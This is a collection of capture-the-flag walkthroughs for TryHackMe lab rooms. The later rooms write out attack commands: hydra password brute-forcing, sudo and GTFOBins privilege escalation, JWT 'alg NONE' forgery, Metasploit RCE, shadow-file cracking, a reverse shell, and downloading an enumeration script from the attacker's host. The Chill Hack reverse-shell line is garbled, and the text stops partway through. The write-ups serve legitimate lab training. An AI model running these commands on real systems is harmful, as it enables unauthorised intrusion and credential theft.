23 | - It seems that Grinch Enterprises has forgotten their SSH keys on our system. One of the shares contains a private key used for SSH authentication (id_rsa). What is the name of the share?
24 |
25 | - `************`
26 |
27 | - We can calculate the MD5 sum of a file using md5sum FILENAME. What is the MD5 sum of id_rsa?
28 |
29 | - `*******************************`
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-13-They_Lost_The_Plan/README.md:
--------------------------------------------------------------------------------
1 | # Day 13 - They Lost The Plan!
2 |
3 |
4 | - Complete the username: p.....
5 |
6 | - `*****`
7 |
8 | - What is the OS version?
9 |
10 | - `**********************`
11 |
12 | - What backup service did you find running on the system?
13 |
14 | - `***********`
15 |
16 | - What is the path of the executable for the backup service you have identified?
17 |
18 | - `**************************************************`
19 |
20 | - Run the whoami command on the connection you have received on your attacking machine. What user do you have?
21 |
22 | - `**********************`
23 |
24 | - What is the content of the flag.txt file?
25 |
26 | - `************`
27 |
28 | - The Grinch forgot to delete a file where he kept notes about his schedule! Where can we find him at 5:30?
29 |
30 | - `**********`
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-14-Dev(Insecure)Ops/README.md:
--------------------------------------------------------------------------------
1 | # Day 14 - Dev(Insecure)Ops
2 |
3 |
4 | - How many pages did the dirb scan find with its default wordlist?
5 |
6 | - `*`
7 |
8 | - How many scripts do you see in the /home/thegrinch/scripts folder?
9 |
10 | - `*`
11 |
12 | - What are the five characters following $6$G in pepper's password hash?
13 |
14 | - `*****`
15 |
16 | - What is the content of the flag.txt file on the Grinch's user’s desktop?
17 |
18 | - `***************************`
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-15-The_Grinchs_day_off/README.md:
--------------------------------------------------------------------------------
1 | # Day 15 - The Grinch's day off
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-16-Ransomware_Madness/README.md:
--------------------------------------------------------------------------------
1 | # Day 16 - Ransomware Madness
2 |
3 | - !!! ВАЖНЫЙ !!!
4 |
5 | No answer needed
6 |
7 | - What is the operator's username?
8 |
9 | - `************`
10 |
11 | - What social media platform is the username associated with?
12 |
13 | - `*******`
14 |
15 | - What is the cryptographic identifier associated with the operator?
16 |
17 | - `********************************`
18 |
19 | - What platform is the cryptographic identifier associated with?
20 |
21 | - `*********`
22 |
23 | - What is the bitcoin address of the operator?
24 |
25 | - `**********************************`
26 |
27 | - What platform does the operator leak the bitcoin address on?
28 |
29 | - `******`
30 |
31 | - What is the operator's personal email?
32 |
33 | - `*****************`
34 |
35 | - What is the operator's real name?
36 |
37 | - `***********`
38 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-17-Elf_Leaks/README.md:
--------------------------------------------------------------------------------
1 | # Day 17 - Elf Leaks
2 |
3 |
4 | - What is the name of the S3 Bucket used to host the HR Website announcement?
5 |
6 | - `******.*******************.***`
7 |
8 | - What is the message left in the flag.txt object from that bucket?
9 |
10 | - `**** **** ** *** **** ***** **** **** *** ***** ** ** **** ** *****`
11 |
12 | - What other file in that bucket looks interesting to you?
13 |
14 | - `*********.***`
15 |
16 | - What is the AWS Access Key ID in that file?
17 |
18 | - `********************`
19 |
20 | - What is the AWS Account ID that access-key works for?
21 |
22 | - `************`
23 |
24 | - What is the Username for that access-key?
25 |
26 | - `***********.***`
27 |
28 | - There is an EC2 Instance in this account. Under the TAGs, what is the Name of the instance?
29 |
30 | - `*********`
31 |
32 | - What is the database password stored in Secrets Manager?
33 |
34 | - `***********`
35 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-18-Playing_With_Containers/README.md:
--------------------------------------------------------------------------------
1 | # Day 18 - Playing With Containers
2 |
3 | - What command will list container images stored in your local container registry?
4 |
5 | - `****** ******`
6 |
7 | - What command will allow you to save a docker image as a tar archive?
8 |
9 | - `****** ****`
10 |
11 | - What is the name of the file (including file extension) for the configuration, repository tags, and layer hash values stored in a container image?
12 |
13 | - `********.****`
14 |
15 | - What is the token value you found for the bonus challenge?
16 |
17 | - `********************************`
18 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-19-Something_Phishy_Is_Going_On/README.md:
--------------------------------------------------------------------------------
1 | # Day 19 - Something Phishy Is Going On
2 |
3 | - Who was the email sent to? (Answer is the email address)
4 |
5 | - `******************.***`
6 |
7 | - Phishing emails use similar domains of their targets to increase the likelihood the recipient will be tricked into interacting with the email. Who does it say the email was from? (Answer is the email address)
8 |
9 | - `********************.****`
10 |
11 | - Sometimes phishing emails have a different reply-to email address. If this email was replied to, what email address will receive the email response?
12 |
13 | - `****************.******`
14 |
15 | - Less sophisticated phishing emails will have typos. What is the misspelled word?
16 |
17 | - `*******`
18 |
19 | - The email contains a link that will redirect the recipient to a fraudulent website in an effort to collect credentials. What is the link to the credential harvesting website?
20 |
21 | - `*****://**********.******/***/*******/`
22 |
23 | - View the email source code. There is an unusual email header. What is the header and its value?
24 |
25 | - `*************: ****`
26 |
27 | - You received other reports of phishing attempts from other colleagues. Some of the other emails contained attachments. Open attachment.txt. What is the name of the attachment?
28 |
29 | - `***************************.***`
30 |
31 | - What is the flag in the PDF file?
32 |
33 | - `***{***************************}`
34 |
35 | If you want to learn more about phishing, check out the "Phishing" module on TryHackMe.
36 |
37 | No answer needed
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-20-What_s_the_Worst_That_Could_Happen/README.md:
--------------------------------------------------------------------------------
1 | # Day 20 - What's the Worst That Could Happen?
2 |
3 | - Open the terminal and navigate to the file on the desktop named 'testfile'. Using the 'strings' command, check the strings in the file. There is only a single line of output to the 'strings' command. What is the output?
4 |
5 | - `**************************}*****************************************`
6 |
7 | - Check the file type of 'testfile' using the 'file' command. What is the file type?
8 |
9 | - `***** ***** **** *****`
10 |
11 | - Calculate the file's hash and search for it on VirusTotal. When was the file first seen in the wild?
12 |
13 | - `********** **:**:**`
14 |
15 | - On VirusTotal's detection tab, what is the classification assigned to the file by Microsoft?
16 |
17 | - `*****:***/***************`
18 |
19 | - Go to this link to learn more about this file and what it is used for. What were the first two names of this file?
20 |
21 | - `*******.*** ** ************.***`
22 |
23 | - The file has 68 characters at the start, known as the known string. It can be appended with whitespace characters up to a limited number of characters. What is the maximum number of total characters that can be in the file?
24 |
25 | - `***`
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-21-Needles_In_Computer_Stacks/README.md:
--------------------------------------------------------------------------------
1 | # Day 21 - Needles In Computer Stacks
2 |
3 | - We changed the text in the string $a as shown in the eicaryara rule we wrote, from X5O to X50, that is, we replaced the letter O with the number 0. The condition for the Yara rule is $a and $b and $c and $d. If we are to only make a change to the first boolean operator in this condition, what boolean operator shall we replace the 'and' with, in order for the rule to still hit the file?
4 |
5 | - `**`
6 |
7 | - What option is used in the Yara command in order to list down the metadata of the rules that are a hit to a file?
8 |
9 | - `**`
10 |
11 | - What section contains information about the author of the Yara rule?
12 |
13 | - `********`
14 |
15 | - What option is used to print only rules that did not hit?
16 |
17 | - `**`
18 |
19 | - Change the Yara rule value for the $a string to X50. Rerun the command, but this time with the -c option. What is the result?
20 |
21 | - `*`
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-22-How_It_Happened/README.md:
--------------------------------------------------------------------------------
1 | # Day 22 - How It Happened
2 |
3 | - What is the username (email address of Grinch Enterprises) from the decoded script?
4 |
5 | - `******.***********.**********.***`
6 |
7 | - What is the mailbox password you found?
8 |
9 | - `*******************`
10 |
11 | - What is the subject of the email?
12 |
13 | - `********* ********`
14 |
15 | - What port is the script using to exfiltrate data from the North Pole?
16 |
17 | - `***`
18 |
19 | - What is the hidden flag found in the document that Grinch Enterprises left behind? (Hint: use the following command: `oledump.py -s {stream number} -d`; the answer will be in the caption).
20 |
21 | - `********************`
22 |
23 | - There is still a second flag somewhere... can you find it on the machine?
24 |
25 | - `*********************`
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-23-PowershELlF_Magic/README.md:
--------------------------------------------------------------------------------
1 | # Day 23 - PowershELlF Magic
2 |
3 | - What command was executed as Elf McNealy to add a new user to the machine?
4 |
5 | - `****************`
6 |
7 | - What user executed the PowerShell file to send the password.txt file from the administrator's desktop to a remote server?
8 |
9 | - `*****`
10 |
11 | - What was the IP address of the remote server? What was the port used for the remote connection? (format: IP,Port)
12 |
13 | - `**.**.***.**,****`
14 |
15 | - What was the encryption key used to encrypt the contents of the text file sent to the remote server?
16 |
17 | - `********************************`
18 |
19 | - What application was used to delete the password.txt file?
20 |
21 | - `*******.***`
22 |
23 | - What is the date and timestamp the logs show that password.txt was deleted? (format: MM/DD/YYYY H:MM:SS PM)
24 |
25 | - `**/**/**** *:**:** **`
26 |
27 | - What were the contents of the deleted password.txt file?
28 |
29 | - `******* *******: ***************************`
30 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-24-Learning_From_The_Grinch/README.md:
--------------------------------------------------------------------------------
1 | # Day 24 - Learning From The Grinch
2 |
3 | - What is the username of the other user on the system?
4 |
5 | - `*****`
6 |
7 | - What is the NTLM hash of this user?
8 |
9 | - `********************************`
10 |
11 | - What is the password for this user?
12 |
13 | - `**********`
14 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/README.md:
--------------------------------------------------------------------------------
1 | # Advent of Cyber 2021 🎄🎅
2 |
3 | ## [tryhackme.com/edoardottt](https://tryhackme.com/p/edoardottt)
4 |
5 |
6 | 
7 |
8 | For this year I didn't provide my solutions to the challenges since there are already amazing YT videos. Thanks THM :)
9 |
10 | 
11 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/aoc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2021/aoc.png
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/aoc2021.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2021/aoc2021.png
--------------------------------------------------------------------------------
/Agent-Sudo/Alien_autospy.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Agent-Sudo/Alien_autospy.jpg
--------------------------------------------------------------------------------
/Agent-Sudo/README.md:
--------------------------------------------------------------------------------
1 | # Agent Sudo
2 |
3 |
4 | - Deploy the machine
5 |
6 | no answer needed
7 |
8 | - How many open ports?
9 |
10 | - `nmap `
11 | - `3`
12 |
13 | - How do you redirect yourself to a secret page?
14 |
15 | - `user-agent`
16 |
17 | - What is the agent name?
18 |
19 | - Let's try changing the user-agent.
20 | - `curl -A "A" -L `. Mmmmh...
21 | - `curl -A "C" -L `. Got it.
22 | - `chris`
23 |
24 | - FTP password
25 |
26 | - `hydra -l chris -P /usr/share/wordlists/rockyou.txt -vV -t 4 ftp`
27 | - `crystal`
28 |
29 | - steg password
30 |
31 | - `ftp `
32 | - Enter username `chris` and password `crystal`.
33 | - `mget *`
34 | - From `ToAgentJ.txt` I can tell that one of the pictures isn't actually a photo.
35 | - In fact, `binwalk -e cutie.png` extracts useful data.
36 | - `cd _cutie.png.extracted`
37 | - `zip2john 8702.zip > zip.hash`
38 | - `john zip.hash` and we get the password
39 | - `7z e zip.hash`, enter `Y` and the password.
40 | - `cat ToAgentR.txt`
41 | - Decoding that odd-looking string in CyberChef (From Base64) gives `Area51`.
42 | - `Area51`
43 |
44 | - Zip file password
45 |
46 | - `alien`
47 |
48 | - Who is the other agent (in full name)?
49 |
50 | - `steghide info cute-alien.jpg`, enter `y` and the passphrase (`Area51`).
51 | - There is a message.txt inside
52 | - `steghide extract -sf cute-alien.jpg`
53 | - `james`
54 |
55 | - SSH password
56 |
57 | - `hackerrules!`
58 |
59 | - What is the user flag?
60 |
61 | - `ssh james@` and then enter the password.
62 | - `cat user_flag.txt`
63 | - `b0**975e8******041**********13c7`
64 |
65 | - What is the incident of the photo called?
66 |
67 | - Enable ssh on your machine
68 | - `scp Alien_autospy.jpg YOUR-USER-HERE@YOUR-IP-HERE:Alien_autospy.jpg`
69 | - Search that photo with Google Reverse Image.
70 | - `Roswell Alien Autopsy`
71 |
72 | - CVE number for the escalation (Format: CVE-xxxx-xxxx)
73 |
74 | - `sudo -l`
75 | - `CVE-2019-14287` ([exploit-db](https://www.exploit-db.com/))
76 |
77 | - What is the root flag?
78 |
79 | - `sudo -u \#$((0xffffffff)) /bin/bash`
80 | - `id`
81 | - `cat /root/root.txt`
82 | - `b53**2f55b57******3341**********`
83 | - `Deskel`
84 |
85 |
86 |
87 |
--------------------------------------------------------------------------------
/Agent-Sudo/To_agentJ.txt:
--------------------------------------------------------------------------------
1 | Dear agent J,
2 |
3 | All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
4 |
5 | From,
6 | Agent C
7 |
--------------------------------------------------------------------------------
/Agent-Sudo/_cutie.png.extracted/365:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Agent-Sudo/_cutie.png.extracted/365
--------------------------------------------------------------------------------
/Agent-Sudo/_cutie.png.extracted/365.zlib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Agent-Sudo/_cutie.png.extracted/365.zlib
--------------------------------------------------------------------------------
/Agent-Sudo/_cutie.png.extracted/8702.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Agent-Sudo/_cutie.png.extracted/8702.zip
--------------------------------------------------------------------------------
/Agent-Sudo/_cutie.png.extracted/To_agentR.txt:
--------------------------------------------------------------------------------
1 | Agent C,
2 |
3 | We need to send the picture to 'QXJlYTUx' as soon as possible!
4 |
5 | By,
6 | Agent R
7 |
--------------------------------------------------------------------------------
/Agent-Sudo/_cutie.png.extracted/zip.hash:
--------------------------------------------------------------------------------
1 | 8702.zip/To_agentR.txt:$zip2$*0*1*0*4673cae714579045*67aa*4e*61c4cf3af94e649f827e5964ce575c5f7a239c48fb992c8ea8cbffe51d03755e0ca861a5a3dcbabfa618784b85075f0ef476c6da8261805bd0a4309db38835ad32613e3dc5d7e87c0f91c0b5e64e*4969f382486cb6767ae6*$/zip2$:To_agentR.txt:8702.zip:8702.zip
2 |
--------------------------------------------------------------------------------
/Agent-Sudo/cute-alien.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Agent-Sudo/cute-alien.jpg
--------------------------------------------------------------------------------
/Agent-Sudo/cutie.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Agent-Sudo/cutie.png
--------------------------------------------------------------------------------
/Agent-Sudo/message.txt:
--------------------------------------------------------------------------------
1 | Hi james,
2 |
3 | Glad you find this message. Your login password is hackerrules!
4 |
5 | Don't ask me why the password look cheesy, ask agent R who set this password for you.
6 |
7 | Your buddy,
8 | chris
9 |
--------------------------------------------------------------------------------
/Anonymous/README.md:
--------------------------------------------------------------------------------
1 | # Anonymous
2 |
3 | - Enumerate the machine. How many ports are open?
4 |
5 | - `scilla port -target `
6 | - `*`
7 |
8 | - What service is running on port 21?
9 |
10 | - `ftp`
11 |
12 | - What service is running on ports 139 and 445?
13 |
14 | - `smb`
15 |
16 | - There's a share on the user's computer. What's it called?
17 |
18 | - `smbclient -L `
19 | - `****`
20 |
21 | - user.txt
22 |
23 | - Connect in anonymous mode via ftp and download everything.
24 | - We can write `clean.sh`, so add a reverse shell.
25 | - Fire up a shell and cat the flag.
26 | - `**********************`
27 |
28 | - root.txt
29 |
30 | - `sudo -l`
31 | - `find / -user root -perm -u=s 2>/dev/null`
32 | - `/usr/bin/env`
33 | - `env /bin/sh -p`
34 | - `cat /root/root.txt`
35 | - `*******************************`
36 |
--------------------------------------------------------------------------------
/Authenticate/README.md:
--------------------------------------------------------------------------------
1 | # Authenticate
2 |
3 | - Deploy the VM
4 |
5 | no answer needed
6 |
7 | - What is the flag you found after logging as Jack?
8 |
9 | - `fad9d***********************`
10 |
11 | - Now try the same thing for username Mike
12 |
13 | no answer needed
14 |
15 | - What is the flag you found after logging as Mike?
16 |
17 | - `e1faaa************************`
18 |
19 | - What is the flag that you found in darren's account?
20 |
21 | - `fe860*************************`
22 |
23 | - Now try to do the same trick and see if you can login as arthur.
24 |
25 | no answer needed
26 |
27 | - What is the flag that you found in arthur's account?
28 |
29 | - `d9ac0*************************`
30 |
31 | - Use the same method to find the identity of the admin user and retrieve the flag.
32 |
33 | - `echo "{"typ":"JWT","alg":"NONE"}" | base64`
34 | - ` echo "{"exp":1586620929,"iat":1586620629,"nbf":1586620629,"identity":0}" | base64`
35 | - `92498*******************`
36 |
37 | - Find the way to get into superadmin ad
38 |
39 | no answer needed
40 |
41 | - What is the password for superadmin account?
42 |
43 | - `abc******`
44 |
45 | - What is the flag you found in superadmin account?
46 |
47 | - `7210*****************`
48 |
49 |
50 |
--------------------------------------------------------------------------------
/Avengers-Blog/README.md:
--------------------------------------------------------------------------------
1 | # Avengers Blog
2 |
3 | - Connect to our network by going to your access page. This is important as you will not be able to access the machine without connecting!
4 |
5 | no answer needed
6 |
7 | - Deploy the machine by clicking the green "Deploy" button on this task and access its webserver.
8 |
9 | no answer needed
10 |
11 | - On the deployed Avengers machine you recently deployed, get the flag1 cookie value.
12 |
13 | - `*****************`
14 |
15 | - Look at the HTTP response headers and obtain flag 2.
16 |
17 | - `headers***************`
18 |
19 | - Look around the FTP share and read flag 3!
20 |
21 | - `nmap -v `
22 | - `ftp `, enter user and password.
23 | - `ls`
24 | - `cd files`
25 | - `get flag3.txt`
26 | - `exit`
27 | - `cat flag3.txt`
28 | - `*************************************`
29 |
30 | - What is the directory that has an Avengers login?
31 |
32 | - `scilla dir -target `
33 | - `/p*****`
34 |
35 | - Log into the Avengers site. View the page source, how many lines of code are there?
36 |
37 | - `***`
38 |
39 | - Read the contents of flag5.txt
40 |
41 | - `rev ../flag5.txt`
42 | - `echo "FLAG" | rev`
43 | - `********************************`
44 |
45 |
46 |
--------------------------------------------------------------------------------
/Baron-Samedit/README.md:
--------------------------------------------------------------------------------
1 | # Baron Samedit
2 |
3 | - Deployed!
4 |
5 | no answer needed
6 |
7 | - After compiling the exploit, what is the name of the executable created (blurred in the screenshots above)?
8 |
9 | - `ssh tryhackme@` and enter the password `tryhackme`
10 | - `cd Exploit`
11 | - `make`
12 | - `sudo-h****************`
13 |
14 | - Run the exploit! You should now have a root shell -- what is the flag in /root/flag.txt?
15 |
16 | - `cat /etc/os-release*`
17 | - `./sudo-h**************** 0`
18 | - `cd /root`
19 | - `cat flag.txt`
20 | - `THM{********************************}`
21 |
--------------------------------------------------------------------------------
/Bash-Scripting/README.md:
--------------------------------------------------------------------------------
1 | # Bash Scripting
2 |
3 | - Are you ready to go!
4 |
5 | no answer needed
6 |
7 | - What piece of code can we insert at the start of a line to comment out our code?
8 |
9 | - `#`
10 |
11 | - What will the following script output to the screen, echo “BishBashBosh”
12 |
13 | - `BishBashBosh`
14 |
15 | - What would this code return?
16 |
17 | - `Jammy is 21 years old`
18 |
19 | - How would you print out the city to the screen?
20 |
21 | - `echo $city`
22 |
23 | - How would you print out the country to the screen?
24 |
25 | - `echo $country`
26 |
27 | - How can we get the number of arguments supplied to a script?
28 |
29 | - `$#`
30 |
31 | - How can we get the filename of our current script (aka our first argument)?
32 |
33 | - `$0`
34 |
35 | - How can we get the 4th argument supplied to the script?
36 |
37 | - `$4`
38 |
39 | - If a script asks us for input how can we direct our input into a variable called ‘test’ using “read”
40 |
41 | - `read test`
42 |
43 | - What will the output of “echo $1 $3” be if the script was run with “./script.sh hello hola aloha”?
44 |
45 | - `hello aloha`
46 |
47 | - What would be the command to print audi to the screen using indexing.
48 |
49 | - `echo "${cars[1]}"`
50 |
51 | - If we wanted to remove tesla from the array how would we do so?
52 |
53 | - `unset cars[3]`
54 |
55 | - How could we insert a new value called toyota to replace tesla?
56 |
57 | - `cars[3]="toyota"`
58 |
59 | - What is the flag to check if we have read access to a file?
60 |
61 | - `-r`
62 |
63 | - What is the flag to check to see if it's a directory?
64 |
65 | - `-d`
66 |
67 | - Well done!
68 |
69 | no answer needed
70 |
71 |
72 |
73 |
74 |
--------------------------------------------------------------------------------
/Bebop/README.md:
--------------------------------------------------------------------------------
1 | # Bebop
2 |
3 | - Deploy the machine
4 |
5 | no answer needed
6 |
7 | - What is your codename?
8 |
9 | - `pilot`
10 |
11 | - What is the User Flag?
12 |
13 | - `scilla port -target `
14 | - `nmap -p 22,23 -A `
15 | - `telnet 23` as `pilot`
16 | - `ls`
17 | - `cat user.txt`
18 | - `**********************`
19 |
20 | - What is the Root Flag?
21 |
22 | - `sudo -l`
23 | - `(root) NOPASSWD: /usr/local/bin/busybox`
24 | - Visit GTFObins, busybox.
25 | - `sudo busybox sh`
26 | - `id`
27 | - `cat /root/root.txt`
28 | - `**************************`
29 |
30 | - What is the low privileged user?
31 |
32 | - `pilot`
33 |
34 | - What binary was used to escalate privileges?
35 |
36 | - `busybox`
37 |
38 | - What service was used to gain an initial shell?
39 |
40 | - `telnet`
41 |
42 | - What Operating System does the drone run?
43 |
44 | - `FreeBSD`
45 |
46 | - Watch the video.
47 |
48 | no answer needed
49 |
50 |
51 |
--------------------------------------------------------------------------------
/Bolt/README.md:
--------------------------------------------------------------------------------
1 | # Bolt
2 |
3 | - Start the machine
4 |
5 | no answer needed
6 |
7 | - What port number has a web server with a CMS running?
8 |
9 | - `nmap -sV `
10 | - `8000`
11 |
12 | - What is the username we can find in the CMS?
13 |
14 | - `bolt`
15 |
16 | - What is the password we can find for the username?
17 |
18 | - `*****d*in123`
19 |
20 | - What version of the CMS is installed on the server? (Ex: Name 1.1.1)
21 |
22 | - Log in to the page `/bolt` with the username and password found previously.
23 | - `Bolt 3.7.1`
24 |
25 | - There's an exploit for a previous version of this CMS, which allows authenticated RCE. Find it on Exploit DB. What's its EDB-ID?
26 |
27 | - Search on Google `Bolt RCE Exploit DB`
28 | - `***2*`
29 |
30 | - Metasploit recently added an exploit module for this vulnerability. What's the full path for this exploit? (Ex: exploit/....)
31 |
32 | - `msfconsole`
33 | - `search bolt`
34 | - `use *`
35 | - `exploit/unix/******************************`
36 |
37 | - Set the LHOST, LPORT, RHOST, USERNAME, PASSWORD in msfconsole before running the exploit
38 |
39 | no answer needed
40 |
41 | - `set LHOST `
42 | - `set LPORT 1234`
43 | - `set RHOST `
44 | - `set USERNAME bolt`
45 | - `set PASSWORD ************`
46 |
47 | - Look for flag.txt inside the machine.
48 |
49 | - `exploit`
50 | - `cat $(find / | grep flag.txt)`
51 | - `THM{***************************}`
52 |
53 |
54 |
55 |
56 |
--------------------------------------------------------------------------------
/Bounty-Hacker/README.md:
--------------------------------------------------------------------------------
1 | # Bounty Hacker
2 |
3 | You were boasting on and on about your elite hacker skills in the bar and a few Bounty Hunters decided they'd take you up on claims! Prove your status is more than just a few glasses at the bar. I sense bell peppers & beef in your future!
4 |
5 | - Deploy the machine.
6 |
7 | no answer needed
8 |
9 | - Find open ports on the machine
10 |
11 | no answer needed
12 |
13 | - `nmap -Pn `
14 |
15 | - Who wrote the task list?
16 |
17 | - `ftp `
18 | - `user`
19 | - `anonymous`
20 | - `recv locks.txt`
21 | - `recv task.txt`
22 | - `cat task.txt`
23 | - `lin`
24 |
25 | - What service can you bruteforce with the text file found?
26 |
27 | - `ssh`
28 |
29 | - What is the user's password?
30 |
31 | - `hydra -s 22 -v -V -l 'lin' -P locks.txt -t 8 ssh`
32 | - `RedDr4gonSynd1cat3`
33 |
34 | - user.txt
35 |
36 | - `ssh lin@` and then enter `yes` and the password `RedDr4gonSynd1cat3`
37 | - `ls`
38 | - `cat user.txt`
39 | - `THM{******SyNd1C4T3}`
40 |
41 | - root.txt
42 |
43 | - Type `sudo -l`, enter the password, and you can see that the user lin can run the `tar` command with sudo.
44 | - Search on [GTFObins](https://gtfobins.github.io/) `tar`
45 | - Then search for `sudo`
46 | - Found this: `sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh`
47 | - Execute this and then `cat /root/root.txt`
48 | - `THM{*************}`
49 |
50 |
51 |
52 |
53 |
--------------------------------------------------------------------------------
/Bounty-Hacker/locks.txt:
--------------------------------------------------------------------------------
1 | rEddrAGON
2 | ReDdr4g0nSynd!cat3
3 | Dr@gOn$yn9icat3
4 | R3DDr46ONSYndIC@Te
5 | ReddRA60N
6 | R3dDrag0nSynd1c4te
7 | dRa6oN5YNDiCATE
8 | ReDDR4g0n5ynDIc4te
9 | R3Dr4gOn2044
10 | RedDr4gonSynd1cat3
11 | R3dDRaG0Nsynd1c@T3
12 | Synd1c4teDr@g0n
13 | reddRAg0N
14 | REddRaG0N5yNdIc47e
15 | Dra6oN$yndIC@t3
16 | 4L1mi6H71StHeB357
17 | rEDdragOn$ynd1c473
18 | DrAgoN5ynD1cATE
19 | ReDdrag0n$ynd1cate
20 | Dr@gOn$yND1C4Te
21 | RedDr@gonSyn9ic47e
22 | REd$yNdIc47e
23 | dr@goN5YNd1c@73
24 | rEDdrAGOnSyNDiCat3
25 | r3ddr@g0N
26 | ReDSynd1ca7e
27 |
--------------------------------------------------------------------------------
/Bounty-Hacker/task.txt:
--------------------------------------------------------------------------------
1 | 1.) Protect Vicious.
2 | 2.) Plan for Red Eye pickup on the moon.
3 |
4 | -lin
5 |
--------------------------------------------------------------------------------
/Brooklyn-Nine-Nine/README.md:
--------------------------------------------------------------------------------
1 | # Brooklyn Nine Nine
2 |
3 | - User flag
4 |
5 | - `scilla port -p -1000 `
6 | - Three ports open.
7 | - `ftp ` with username anonymous and no pwd.
8 | - `get note_to_jake.txt`
9 | - `cat note_to_jake.txt`
10 | - Cool.
11 | - `hydra -l jake -P /usr/share/wordlists/rockyou.txt ssh:// -f -VV -t 4`
12 | - `ssh jake@` and enter the pwd.
13 | - `ls -alh`
14 | - `cd ..`
15 | - `cd holt`
16 | - `ls -lah`
17 | - `cat user.txt`
18 | - `********************************`
19 |
20 | - Root flag
21 |
22 | - `sudo -l`
23 | - `sudo less /root/root.txt`
24 | - `********************************`
25 |
26 |
27 |
28 |
--------------------------------------------------------------------------------
/Brute-It/README.md:
--------------------------------------------------------------------------------
1 | # Brute It
2 |
3 | - Deploy the machine
4 |
5 | no answer needed
6 |
7 | - How many ports are open?
8 |
9 | - `nmap -p- ` or
10 | - `scilla port -target `
11 | - `2`
12 |
13 | - What version of SSH is running?
14 |
15 | - `nmap -sS -sV -Pn -p 22 `
16 | - `OpenSSH 7.6p1`
17 |
18 | - What version of Apache is running?
19 |
20 | - `nmap -sS -sV -Pn -p 80 `
21 | - `2.*.**`
22 |
23 | - Which Linux distribution is running?
24 |
25 | - `Ubuntu`
26 |
27 | - What is the hidden directory?
28 |
29 | - `scilla dir -target `
30 | - `/admin`
31 |
32 | - What is the user:password of the admin panel?
33 |
34 | - `hydra -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/admin/index.php:user=^USER^&pass=^PASS^:Username or password invalid" -f`
35 | - `admin:******`
36 |
37 | - What is John's RSA Private Key passphrase?
38 |
39 | - `python2 /usr/share/john/ssh2john.py rsa_priv > hash`
40 | - `john --wordlist=/usr/share/wordlists/rockyou.txt hash`
41 | - `**********`
42 |
43 | - user.txt
44 |
45 | - `chmod 400 hash`
46 | - `ssh john@ -i rsa_priv` and enter the passphrase
47 | - `cat user.txt`
48 | - `THM{***************************}`
49 |
50 | - Web flag
51 |
52 | - `THM{********************}`
53 |
54 | - What is the root's password?
55 |
56 | - `sudo cat /etc/shadow`
57 | - `sudo cat /etc/passwd`
58 | - Copy these two files onto your machine
59 | - `unshadow passwd shadow > passwords.txt`
60 | - `john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt`
61 | - `*********`
62 |
63 | - root.txt
64 |
65 | - `sudo -l`
66 | - https://gtfobins.github.io/gtfobins/cat/
67 | - `sudo cat /root/` :)
68 |
69 |
70 |
--------------------------------------------------------------------------------
/Chill-Hack/README.md:
--------------------------------------------------------------------------------
1 | # Chill Hack
2 |
3 | - User Flag
4 |
5 | - `scilla port -target -p -1000`
6 | - `ftp `
7 | - `anonymous`, no password
8 | - `get note.txt`
9 | - `scilla dir -target `
10 | - secret directory found.
11 | - Execute `cat /etc/passwd`. ahahhahahahahahahhaa.
12 | - So, execute `cat&1|nc 1234 >/tmp/f`
15 | - Cool.
16 | - `python3 -c 'import pty;pty.spawn("/bin/bash")'`
17 | - `cd /home`
18 | - `sudo -l`
19 | - `cd apaar`
20 | - `sudo -u apaar /home/apaar/.helpline.sh`
21 | - `/bin/sh` and `/bin/sh`
22 | - `id`
23 | - `cat local.txt`
24 | - `{USER-FLAG: *********************************}`
25 |
26 | - Root Flag
27 |
28 | - `wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh`
29 | - `python3 -m http.server`
30 | - On target `curl :8000/LinEnum.sh > linenum.sh`
31 | - `chmod +x linenum.sh`
32 | - `./linenum.sh`
33 | ~~~
34 | [-] Listening TCP:
35 | Active Internet connections (only servers)
36 | Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
37 | tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
38 | tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
39 | tcp 0 0 127.0.0.1:9001 0.0.0.0:* LISTEN -
